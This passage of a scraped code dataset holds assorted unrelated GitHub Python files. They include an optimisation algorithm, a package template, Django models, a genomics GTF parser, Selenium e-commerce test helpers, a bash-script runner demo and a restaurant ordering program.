if(function.func(self.swarm[j].x) < function.func(self.swarm[j].p)):\n self.swarm[j].p = self.swarm[j].x\n worst_curr = -999999\n avg_curr = 0\n best_curr = 999999\n for j in range(self.d):\n if(function.func(self.swarm[j].x)worst_curr):\n worst_curr = function.func(self.swarm[j].x)\n avg_curr = avg_curr + function.func(self.swarm[j].x) \n if(function.func(self.swarm[j].x) < function.func(self.g)):\n self.g = self.swarm[j].x\n avg_curr = avg_curr/(self.d)\n self.best.append(best_curr)\n self.average.append(avg_curr)\n self.worst.append(worst_curr)\n print(\"minimum value : \",function.func(self.g),\"minimizer point:\",self.g)\n \n \"\"\"\n Following function is used to generate a list of function values from given list x2 and x1. 
\n \"\"\"\n def fx_contour(self,x1,x2):\n return np.power(x2-x1,4)+(12*x1*x2)-x1+x2-3\n \n \"\"\"\n Following function is used plot a contour plot and the plot of best, average and worst function values for each iteration.\n \"\"\"\n def plot(self):\n X = np.linspace(-1,1,50)\n Y = np.linspace(-1,1,50)\n X,Y = np.meshgrid(X,Y)\n Z = self.fx_contour(X,Y)\n plt.contour(X,Y,Z,colors='black')\n for j in range(self.d):\n x1 = []\n x2 = []\n self.swarm[0].x_arr = np.array(self.swarm[0].x_arr)\n for i in range(self.epochs + 1):\n x1.append(self.swarm[j].x_arr[i][0][0])\n x2.append(self.swarm[j].x_arr[i][1][0])\n plt.plot(x1,x2,color='blue')\n plt.scatter(x1,x2,color='red')\n plt.show()\n X = []\n for i in range(len(self.best)):\n X.append(i+1)\n plt.plot(X,self.best,color='green')\n plt.scatter(X,self.best,color='green')\n plt.plot(X,self.average,color='blue')\n plt.scatter(X,self.average,color='blue')\n plt.plot(X,self.worst,color='red')\n plt.scatter(X,self.worst,color='red')\n plt.ylabel(\"Function value\")\n plt.xlabel(\"Iteration\")\n plt.title(\"Best, average and worst function value at each iteration\")\n plt.show()\n\n\"\"\"\nFollowing piece of code initializes a PSO object, calls minimize function and plots final graphs.\n\"\"\"\nnum_of_particles = 14\nnum_of_iterations = 20\nparticle_best_weight = 1.8\nglobal_best_weight = 1.8\nparticle_previous_influence_weight = 0.8\npso = PSO(num_of_iterations,num_of_particles,particle_previous_influence_weight,particle_best_weight,global_best_weight)\npso.minimize()\npso.plot()","repo_name":"Shahil98/Optimization-Algorithms","sub_path":"PSO/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"947566822","text":"pkgname = \"waypipe\"\npkgver = \"0.8.6\"\npkgrel = 0\nbuild_style = \"meson\"\nconfigure_args = [\n \"-Dwith_dmabuf=enabled\",\n \"-Dwith_systemtap=false\",\n \"-Dwith_vaapi=enabled\",\n \"-Dwith_video=enabled\",\n \"-Dwith_zstd=enabled\",\n \"-Db_ndebug=true\",\n]\nhostmakedepends = [\n \"meson\",\n \"pkgconf\",\n \"scdoc\",\n \"wayland-progs\",\n]\nmakedepends = [\n \"ffmpeg-devel\",\n \"libdrm-devel\",\n \"libva-devel\",\n \"zstd-devel\",\n \"mesa-devel\",\n \"wayland-devel\",\n \"wayland-protocols\",\n]\npkgdesc = \"Proxy for wayland clients\"\nmaintainer = \"psykose \"\nlicense = \"MIT\"\nurl = \"https://gitlab.freedesktop.org/mstoeckl/waypipe\"\nsource = f\"https://gitlab.freedesktop.org/mstoeckl/waypipe/-/archive/v{pkgver}/waypipe-v{pkgver}.tar.bz2\"\nsha256 = \"da40de2e02d60c2c34d549e791a9019c1ddf9d79f42bfad0c6cb74f3f6af9b16\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_install(self):\n self.install_license(\"COPYING\")\n","repo_name":"chimera-linux/cports","sub_path":"contrib/waypipe/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"36"}
+{"seq_id":"74143297703","text":"def coolString(inputString):\n\n def isLowercase(symbol):\n if 'a' <= symbol <= 'z':\n return True\n return False\n\n def isUppercase(symbol):\n if 'A' <= symbol <= 'Z':\n return True\n return False\n\n firstIsLowercase = isLowercase(inputString[0])\n firstIsUppercase = isUppercase(inputString[0])\n\n if not (firstIsLowercase or firstIsUppercase):\n return False\n\n for i in range(1, len(inputString)):\n if i % 2 != 0:\n if (isLowercase(inputString[i]) == firstIsLowercase or\n isUppercase(inputString[i]) == firstIsUppercase):\n return False\n else:\n if (isLowercase(inputString[i]) != firstIsLowercase or\n isUppercase(inputString[i]) != firstIsUppercase):\n return False\n","repo_name":"jahirulislammolla/CodeFights","sub_path":"Fights/coolString.py","file_name":"coolString.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"6228768502","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n# Create your models here.\n\n\n\n# ? not sure wether to have user on workouts or workouts on user?\n# ! calculating speed in serializers\n# ? graph relationships to workouts. many to one? how would model show \n# ? fields to have on graph model?\n# * have levels associated with graph for exp?\n\n\nclass MuscleTraining(models.Model):\n name = models.CharField(max_length=50)\n muscles_worked = models.CharField(max_length=100)\n weight = models.IntegerField()\n duration = models.IntegerField(null=True)\n sets = models.IntegerField()\n reps = models.IntegerField()\n speed = models.IntegerField(null=True)\n user = models.ForeignKey(User, related_name='muscle_trainings', on_delete=models.CASCADE)\n\n def __str__(self):\n return f'{self.name}'\n\nclass Cardio(models.Model):\n type = models.CharField(max_length=50)\n duration = models.IntegerField()\n distance = models.IntegerField()\n speed = models.FloatField(null=True)\n user = models.ForeignKey(User, related_name='cardios', on_delete=models.CASCADE)\n def __str__(self):\n return f'{self.type}'\n\n\n","repo_name":"tombannister01/Fitness-Tracker-App","sub_path":"workouts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"21588445168","text":"#Blinks LED on pin 13 - Adafruit Edge Badge\n#No other files required\n\nimport time\nimport board\nfrom digitalio import DigitalInOut, Direction, Pull\n\nled = DigitalInOut(board.D13)\nled.direction = Direction.OUTPUT\n\nwhile True:\n led.value = True\n time.sleep(1)\n led.value = False\n time.sleep(1)\n","repo_name":"JeremySCook/Edge-Badge","sub_path":"blink-led.py","file_name":"blink-led.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16108409610","text":"\n# coding: utf-8\n\n# In[1]:\n\n#!/usr/bin/env python\n\n\"\"\"new_gtf_genome_wide_parser.py: New gtf parses much faster and more effecient.\"\"\"\n\n__authos__ = \"Israa Alqassem\"\n__copyright__ = \"Copyright 2017, McSplicer\"\n\n\nimport csv\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n\n\ndef get_all_genes_dict(gtf_file, tx_anno=False):\n\n gene_dict = {}\n ss_anno = defaultdict(list)\n\n with open(gtf_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\")\n for line in reader:\n if line[2] == 'subexon':\n start_site = int(line[3])\n end_site = int(line[4])\n strand_dir = line[6]\n\n gene_id = ''\n chr_id = line[0]\n\n feature_list = line[8].split(';')\n for feature in feature_list:\n tag_val = feature.split()\n if len(tag_val) == 2:\n\n tag = tag_val[0]\n value = tag_val[1]\n\n if tag=='SpliceEnd':\n splice_end = value[1:2] # R, L, or B\n elif tag=='NodeId':\n subexon_id = int(value)\n elif tag=='transcript_id':\n trans_id = value[1:-1]\n elif tag == 'gene_id':\n gene_id = value[1:-1] #remove double qouts\n\n if gene_id != '':\n if gene_id not in gene_dict:\n gene_dict[gene_id] = []\n\n\n gene_dict[gene_id].append([subexon_id,strand_dir,splice_end,start_site,end_site,trans_id,chr_id])\n if tx_anno:\n ss_anno[start_site].append(trans_id)\n ss_anno[end_site].append(trans_id)\n\n return gene_dict,ss_anno\n\n\n\n\ndef create_location_dicts(start_sites, end_sites, strand_dir):\n \"\"\" This func expects sorted start_sites and end_sites based on strand direction\n Returns 3 dicts:\n loc_index_dict -> Key: location, val: index\n start_sites_dict -> key: start location, index (helps to determine s1, s2, ...)\n end_sites_dict -> key: end location, index (helps to determine e1, e2, ...)\n \"\"\"\n\n loc_index_dict = {}\n start_sites_dict = {}\n end_sites_dict = {}\n\n location_list = [] # List of all start and end locations\n location_list.extend(start_sites)\n location_list.extend(end_sites)\n\n if strand_dir == '+':\n location_list.sort()\n else:\n location_list.sort(reverse=True)\n\n index = 0\n #print 'index','location'\n for location in location_list:\n #if location not in loc_index_dict:\n #print index, location\n loc_index_dict[location] = index\n index+=1\n\n index = 0\n for location in start_sites:\n start_sites_dict[location] = index\n index+=1\n\n index = 0\n for location in end_sites:\n end_sites_dict[location] = index\n index+=1\n\n\n return loc_index_dict, start_sites_dict, end_sites_dict\n\n\ndef get_gene_data(gene_id,gene_datalist):\n\n #for gene_id in gene_dict.keys():\n\n subexon_ids_dict = {}\n start_sites = []\n end_sites = []\n\n #print '>>>>>',gene_id\n for row in gene_datalist:\n subexon_id = row[0]\n strand_dir = row[1]\n splice_end = row[2]\n start_site = row[3]\n end_site = row[4]\n trans_id = row[5]\n\n\n \"\"\"\n Forward strand (+):\n potential start sites -> Left of L\n Left of B\n potential end sites -> Right of R\n Right of B\n\n s_____s____ e_____e\n |__L__|__B__|__R__|\n\n\n Backward strand (+):\n potential start site -> right of L\n right of B\n potential end site -> Left of R\n Left of B\n\n e_____e_____s_____s\n |__R__|__B__|__L__|\n\n \"\"\"\n\n if strand_dir == '+': # Forward strand\n subexon_ids_dict[subexon_id] = [start_site,end_site]\n\n if splice_end=='R':\n end_sites.append(end_site)\n elif splice_end=='L':\n start_sites.append(start_site)\n\n elif splice_end=='B':\n start_sites.append(start_site)\n end_sites.append(end_site)\n\n elif splice_end !='-': # dash means internal exon, 
just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n elif strand_dir == '-': # Reverse strand\n subexon_ids_dict[subexon_id] = [end_site,start_site]\n\n if splice_end=='R':\n end_sites.append(start_site)\n elif splice_end=='L':\n start_sites.append(end_site)\n\n elif splice_end=='B':\n start_sites.append(end_site)\n end_sites.append(start_site)\n\n elif splice_end !='-': # dash means internal exon, just ignore it, otherwise show error\n print('Error: Splice end value must be L, R, or B. Undefined splice end -> ' + splice_end)\n\n\n start_sites = list(np.unique(start_sites))\n end_sites = list(np.unique(end_sites))\n\n\n if strand_dir == '-':\n end_sites.sort(reverse=True)\n start_sites.sort(reverse=True)\n elif strand_dir == '+':\n end_sites.sort()\n start_sites.sort()\n\n\n loc_index_dict, start_sites_dict, end_sites_dict = create_location_dicts(start_sites,end_sites, strand_dir)\n\n\n\n return strand_dir,loc_index_dict, start_sites_dict, end_sites_dict, subexon_ids_dict\n\n#start_time = time.time()\n#print \"--- %s seconds ---\" % str('{0:0.2f}'.format(time.time() - start_time))\n","repo_name":"canzarlab/McSplicer","sub_path":"python_scripts/new_gtf_genome_wide_parser.py","file_name":"new_gtf_genome_wide_parser.py","file_ext":"py","file_size_in_byte":5951,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
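A minimal usage sketch for the two entry points above ('annotation.gtf' is a placeholder path; per the parser, the file must contain 'subexon' records carrying NodeId/SpliceEnd/transcript_id/gene_id attributes):

gene_dict, ss_anno = get_all_genes_dict('annotation.gtf', tx_anno=True)
for gene_id, rows in gene_dict.items():
    strand, loc_index, starts, ends, subexons = get_gene_data(gene_id, rows)
    print(gene_id, strand, len(starts), len(ends))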
+{"seq_id":"28869998262","text":"class Platoon(pycbf2.NESystem):\n def __init__(self, length, t_safety, v_goal):\n super(Platoon, self).__init__()\n\n for i in range(length):\n vehicle = Link(\n parent=self,\n mass=1,\n center_of_mass=[0, 0, 0],\n inertia_tensor=np.eye(3),\n index=i,\n axis=[1, 0, 0],\n link_type=LinkType.prismatic,\n rotation_local=np.eye(3),\n position=[0, 0, 0],\n )\n\n t, x, xdot = self.cbf_vars()\n\n class Controller(cbf.ControlFunc):\n def __init__(self):\n self.cbf = 1\n for i in range(length - 1):\n self.cbf *= (x[i + 1] - x[i]) - t_safety * xdot[i]\n self.t = 0\n\n def input_matrix(self, x, xdot):\n return np.eye(length)\n\n def uref(self, x, xdot):\n return v_goal - xdot\n\n self.controller = Controller()","repo_name":"danieljpietz/MSThesis","sub_path":"Code Examples/Platoon.py","file_name":"Platoon.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"24214557733","text":"from lib.ui_lib import *\n\nclass OrderClass(CommonMethods):\n\n def get_order_number(self,browser):\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\")\n browser_success_msg = element.text\n order_number = browser_success_msg[7:10]\n assert order_number != ''\n return order_number\n\n def search_order(self,browser,orderID):\n self.wait_until_element_present('keyword-filter', 'ID')\n e = browser.find_element_by_id('keyword-filter')\n e.send_keys(orderID)\n try:\n browser.find_element_by_xpath('//span[@class=\"responsive-hide\"]').click()\n except NoSuchElementException:\n browser.find_element_by_css_selector('.action-divider .filter-button').click()\n except WebDriverException:\n pass\n\n def get_order_status(self,browser, url, Order_Id):\n browser.get(urlparse.urljoin(url, '/admin/index.php?ToDo=viewOrders'))\n element = self.wait_until_element_present('//input[@id=\"keyword-filter\"]', \"XPATH\")\n element.clear()\n element.send_keys(Order_Id)\n browser.find_element_by_css_selector('.filter .btn-secondary').click()\n self.wait_until_element_present('status_' + Order_Id, 'ID')\n return browser.find_element_by_id('status_' + Order_Id).get_attribute('value')\n\n def refund_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open Refund modal\n element = self.wait_until_element_present('Refund', 'LINK')\n element.click()\n # Refund transaction\n element = self.wait_until_element_present('//label[@for=\"refundType_full\"]', 'XPATH')\n element.click()\n browser.find_element_by_id('refund-save').click()\n\n def capture_funds(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Capture Funds', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def void_transaction(self,browser, Order_Id):\n # Open order cog\n element = self.wait_until_element_present(\"//tr[@data-order-id = '\" + Order_Id + \"']\", 'XPATH')\n element = element.find_element_by_class_name('dropdown-trigger')\n element.click()\n # Open capture modal\n element = self.wait_until_element_present('Void Transaction', 'LINK')\n element.click()\n # Process capture\n element = self.wait_until_element_present('#display-modal .dialog-actions .btn-primary', 'CSS_SELECTOR')\n element.click()\n\n\n def delete_order(self,browser):\n\n browser.find_element_by_xpath('//label[@for = \"order0\"]').click()\n self.select_dropdown_value(browser, 'OrderActionSelect', 'Archive Selected')\n browser.find_element_by_id('action-confirm').click()\n try:\n alert = browser.switch_to_alert()\n alert.accept()\n except WebDriverException:\n browser.execute_script(\"window.confirm = function(){return true;}\");\n browser.find_element_by_id('action-confirm').click()\n #Verify Order delete\n element = self.wait_until_element_present('//div[@class = \"alert alert-success\"]/p', \"XPATH\").text\n assert \"The selected orders have been deleted successfully.\" in element\n\n def goto_view_orders(self,browser):\n 
self.wait_until_element_present('Orders', 'LINK').click()\n        self.wait_until_element_present('View Orders', 'LINK').click()\n\n    def cp_add_order_item(self, browser, name):\n        # Add an Item\n        element = self.wait_until_element_present('quote-item-search', \"ID\")\n        element.click()\n        element.send_keys(name)\n        self.wait_until_element_present('//div[@class = \"recordContent undefined\"]', 'XPATH')\n        browser.execute_script(\"$('#quote-item-search').trigger('keyup')\")\n        browser.execute_script(\"$('.recordContent:eq(0)').trigger('click')\")\n        self.wait_until_element_present('//span[@class = \"swatchColour swatchColour_1\"]', \"XPATH\")\n        browser.find_element_by_xpath('//span[@class = \"swatchColour swatchColour_1\"]').click()\n        browser.find_element_by_id('dialog-options-submit').click()\n        self.wait_until_element_present('//th[@class = \"image\"]', \"XPATH\")\n        browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n        self.wait_until_element_present('//label[@for = \"shipping-single\"]', 'XPATH')\n\n    def cp_select_shipping_payment(self, browser, paymentname):\n        browser.find_element_by_xpath('//label[@for = \"shipping-single\"]').click()\n        browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n        self.wait_until_element_present(\"//select[@id='paymentMethod']/option[text()='\"+paymentname+\"']\", \"XPATH\").click()\n        # these two calls belong to the browser, not to this class (the original called them on self)\n        browser.find_element_by_css_selector('.Field_custom_name input')\n        browser.execute_script(\"$('.Field_custom_name input').val('\"+paymentname+\"');\")\n        browser.find_element_by_xpath('//button[@class = \"btn btn-primary orderMachineSaveButton orderSaveButton\"]').click()\n\n    def create_order_controlpanel(self, browser, email, password, firstname, lastname, company, phone, street_add1, street_add2, city, country, state, postcode, invalid_email, invalid_pwd):\n        element = self.wait_until_element_present('Orders', \"LINK\")\n        element.click()\n        browser.find_element_by_link_text('Add an Order').click()\n        element = self.wait_until_element_present('//label[@for = \"check-new-customer\"]', \"XPATH\")\n        element.click()\n        # Validation for Invalid Email\n        browser.find_element_by_id('FormField_1').send_keys(invalid_email)\n        browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n        assert \"Please enter a valid email address such as joe@example.com\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n        browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n        browser.find_element_by_id('FormField_1').clear()\n        browser.find_element_by_id('FormField_1').send_keys(email)\n        # Validation for Invalid Password\n        browser.find_element_by_id('FormField_2').send_keys(invalid_pwd)\n        browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n        assert \"The password and confirmed password do not match.\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n        browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n        browser.find_element_by_id('FormField_2').clear()\n        browser.find_element_by_id('FormField_2').send_keys(password)\n        browser.find_element_by_id('FormField_3').send_keys(password)\n        self.select_dropdown_value(browser, 'accountCustomerGroup', '-- Do not assign to any group --')\n        browser.find_element_by_id('FormField_4').send_keys(firstname)\n        browser.find_element_by_id('FormField_5').send_keys(lastname)\n        browser.find_element_by_id('FormField_6').send_keys(company)\n        browser.find_element_by_id('FormField_7').send_keys(phone)\n        browser.find_element_by_id('FormField_8').send_keys(street_add1)\n        browser.find_element_by_id('FormField_9').send_keys(street_add2)\n        browser.find_element_by_id('FormField_10').send_keys(city)\n        self.select_dropdown_value(browser, 'FormField_11', country)\n        self.select_dropdown_value(browser, 'FormField_12', state)\n        self.clear_field(browser, 'FormField_13')\n        browser.find_element_by_id('FormField_13').send_keys(postcode)\n        browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n        # Add an Item\n        self.cp_add_order_item(browser, '[Sample] Anna, bright single bangles')\n        # Select Shipping address and Payment method\n        self.cp_select_shipping_payment(browser, 'Manual Payment')\n\n        # Verify and Assert the success message\n        browser_success_msg = self.wait_until_element_present('.alert-success', 'CSS_SELECTOR').text\n        order_success_msg = \"Order #%s has been created successfully.\" % browser_success_msg[7:10]\n        orderID = self.get_order_number(browser)\n\n        assert order_success_msg in browser_success_msg\n        return orderID\n","repo_name":"testing-sravan/tests-scripts-worked","sub_path":"Regression_suite_bigc/lib/order_class.py","file_name":"order_class.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"75139715881","text":"from parse import compile\r\n\r\n\r\nclass StepTable:\r\n \"\"\"Step table parser utility class\"\"\"\r\n KEY_TEXT = 'key'\r\n EMPTY_TEXT = ''\r\n VALUE_TEXT = 'value'\r\n NESTED_KEY_TEXT = 'nested_key'\r\n EMPTY_DOUBLE_QUOTES = '\"\"'\r\n NEW_LINE_CHARACTER = '\\n'\r\n LESS_THAN_CHARACTER = '<'\r\n GREATER_THAN_CHARACTER = '>'\r\n key_value_schema = compile('|{key:^w}|{value:^}|')\r\n nested_key_value_schema = compile('|{key:^w}|{nested_key:^}|{value:^}|')\r\n\r\n @staticmethod\r\n def parse_step_table(step_table: str):\r\n \"\"\"Parse static step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n Key value mapping with empty value will be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n if line == StepTable.EMPTY_TEXT:\r\n break\r\n result = StepTable.key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_nested_key_step_table(step_table: str):\r\n \"\"\"Parse static nested step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n If empty value, simple or nested key value be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n result = StepTable.nested_key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse nested step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n elif result.named[StepTable.NESTED_KEY_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n else:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT):\r\n {result.named.get(StepTable.NESTED_KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)}\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_step_table_example_value(request, table_dict):\r\n \"\"\"Parse step table example value\"\"\"\r\n return {key: StepTable.get_value(request, value) for key, value in table_dict.items()}\r\n\r\n @staticmethod\r\n def get_value(request, argument):\r\n \"\"\"Get fixture value from BDD examples\"\"\"\r\n if argument[0] == StepTable.LESS_THAN_CHARACTER and argument[-1] == StepTable.GREATER_THAN_CHARACTER:\r\n value = request.getfixturevalue(argument[1:-1])\r\n return None if value == StepTable.EMPTY_TEXT else value\r\n return None if argument == StepTable.EMPTY_DOUBLE_QUOTES else argument\r\n","repo_name":"kr87nikhil/python-bdd","sub_path":"utility/parse_steps.py","file_name":"parse_steps.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36982475426","text":"\"\"\"Script to test execution of bash scripts, gathering\n the results, combining them and saving them.\n\n\t @author 'Pat Barton'\t \n\"\"\"\n\n\n\n\"\"\"This demo is simple, but shows all the key steps required to integrate\n existing bash scripts with you python codes.\n\n Exactly what the bash scripts do is not important so we'll \n spin up some trivial ones. We'll just make some up. For\n\t demo purposes all will do the same thing - return the names\n\t of files (ls/dir command) - from their directories.\n\n We'll create different directories for each of three bash scripts\n and populate the directories with files named so we know where\n\t they camre from.\n\n\tAll this happens in setup_scratch_dirs() - not that all this functionality\n\t is isolated from the rest of the code. That way it'll be easy to substitute\n\t \"real\" bash scripts from your own directories. Note the use of \n\t tempfile.mkdtemp() - this writes a scratch directory somewhere safe. Note\n\t also that we're exercising good manners by cleaning up the mess using\n\t shutil.rmtree.\n\n\t=======\n\tThe bash files will go out into the world and do something. All this functionality\n\t is handled in run_scripts(). Note, again, the isolated functionality - this makes things\n\t easy to maintain. We run the scripts and capture their output with the \n\t subprocess.check_output() method.\n\n\t===\n\tAt the end of the day we want to do something with the output. That's all handled in\n\t the process_output() function. Naturally, you'll want to \"roll your own\" here, but you \n\t know where to put it.\n\n\t===\n\tThe global namespace of the module is uncluttered. The bit at the top wrangles the \n\t imports and makes sure we remember the original directory. The bit at the bottom\n\t cleans things up and ensures that we leave the working directory right where we found it.\n\"\"\"\n\nimport tempfile\nimport os\nimport shutil\nimport subprocess\n\nNUM_SCRIPTS = 3\n\n#make a temp dir and switch into it.\norig_dir = os.getcwd() #remember original dir\ntemp_dir = tempfile.mkdtemp() #returns name of new dir\nos.chdir(temp_dir) #switch to temp dir\n\ndef setup_scratch_dirs():\n \"\"\"This routine makes subdirectories in scratch folder. Each\n gets populated with a few empty files and its own bash script.\n So it'll look like:\n scratch\\\n subdir0\\\n \t subdir0_file0\n \t\t subdir0_file1\n \t\t subdir0_file2\n \t\t script0.sh\n \tThe script file just contains the command 'ls' and will list the\n \tfiles in its subdir (makes output easy to check)\n\n \tA list of the script files is returned.\n \"\"\"\t\t \n scrip_paths=[]\n for s in range(NUM_SCRIPTS):\n subname = \"subdir\" + str(s)\n sub = os.mkdir(subname) #make sudirs named 'subdir0', etc.\n os.chdir(subname) #switch to subdir\n for f in range(5): \n filename = \"subdir\" + str(s) + \"_file\" + str(f)\n open(filename, 'w').close()\n\n #create a script file and a file handler\n scriptname = 'script' + str(s) + \".sh\"\n scrip_paths.append(os.path.join(os.getcwd(), scriptname))\n with open(scriptname, 'w') as script:\n script.write(\"#! /bin/bash\\n\")\n script.write(\"ls\\n\") #lists contents of the director\n\n os.chmod(scriptname, 0o777) #let anyone do anything with the script\n\n os.chdir('..') #switch to scratch dir\n\n return scrip_paths\n\ndef run_scripts(scripts):\n \"\"\"Expects an iterable object (list, tuple, etc.) containing\n fully-specified path to script file. 
Runs each script, \n captures the output, and does something with the output.\n\n The subprocess module has tons of options. You can read\n all about them here:\n\n https://docs.python.org/3/library/subprocess.html\n\n Output is stored in a list, one element for each script,\n and returned.\n\n \"\"\"\n output_list=[]\n for index, s in enumerate(scripts):\n #split path name from script name\n sdir, sname = os.path.split(s) \n #run the script using its dir as the cwd, capture output\n os.chdir(sdir)\n output = subprocess.check_output(s)\n output_list.append(output)\n return output_list\n\n\n\ndef process_output(output):\n \"\"\"Does something with the output, which enters this function\n as a list. Do anything you want here, I'm just having fun\"\"\"\n\n for i in range(len(output)):\n \"this makes a list from the return of a ls from linux\"\n output[i] = output[i].split()\n\n stg = \"{} HealthCheckPassed \\n\\t{} INROTATION \\n\\t{} STATUSCODE\"\t\n for result0, result1, result2 in zip(output[0], output[1], output[1]):\n print(stg.format(result0, result1, result2))\n\n\nscripts = setup_scratch_dirs()\t\noutput = run_scripts(scripts)\nprocess_output(output)\n\nos.chdir(orig_dir)\nshutil.rmtree(temp_dir)\t\n\n\n","repo_name":"pbarton666/learninglab","sub_path":"experimental/py_run_bash_scripts.py","file_name":"py_run_bash_scripts.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"73432611881","text":"# 点菜小程序\nmenu_list = [ \"糖醋排骨\",\"水煮鱼\",\"大盘鸡\",\"拌黄瓜\",\"萝卜炒肉\",\"土豆丝\"] # 菜品目录\nprice = [48, 58,38, 12 , 45 ,15 ] # 菜品价格\norder_price = 0 # 菜品单价\norder_list = [] # 已点菜品\ncount = 0 # 计算总价\nk = 0 # 餐品数目\nn = 0\nseat_list = [2,2,2,4,4,4,6,6,6] # 每桌的座位数\nsitdown_list = [] # 存放已经被坐了的座位号\nguest_list =[] # 存放就餐人数量\nprint(\"**************欢迎光临大连工业大学小菜馆**************\")\nx = int(input(\"请问您几位: \"))\nguest_list.append(x)\nfor y in seat_list:\n n += 1\n if y >= x:\n sitdown_list.append(seat_list.index(y))\n seat_list.remove(y)\n print(\"您的座位是{}号桌\".format(sitdown_list))\n break\nif n != seat_list.index(y) + 1:\n print(\"对不起,本餐厅没有合适的座位。\")\nelse:\n print(\"请您参考下列菜单菜品价格进行点菜\")\n print(\"Python 365 菜品\\n\",menu_list)\n print(\"Python 365 菜单价格\\n\",price)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n def order_1(menu_list, order_list,server1):\n order_list.append(server1)\n print('已经点购菜名:{}'.format(order_list))\n a = menu_list.index(server1)\n return(a)\n while ( server != 'N'):\n if (server != 'C'):\n k+=1\n order_price = order_1(menu_list, order_list, server)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n count += price[order_price]\n else:\n if (k==0):\n print(\"!!!您还未点任何菜品!!!\")\n server = input('请输入菜品进行点餐: ')\n else:\n cancle = input('请输入要取消的菜品: ')\n b = menu_list.index(cancle)\n order_list.remove(cancle)\n count -= price[b]\n k -=1\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n print(\"一共点了{0}道菜品,共计{1}元\".format(k,count))\n while True:\n fee = float(input(\"您支付的金额是:\"))\n if float(fee) < float(count):\n print(\"***************您支付的金额不足***************\")\n continue\n else:\n print(\"您支付了{}元,找您{}元\".format(count, fee - count))\n break","repo_name":"Bryson582/Python_365","sub_path":"ordermeal.py","file_name":"ordermeal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
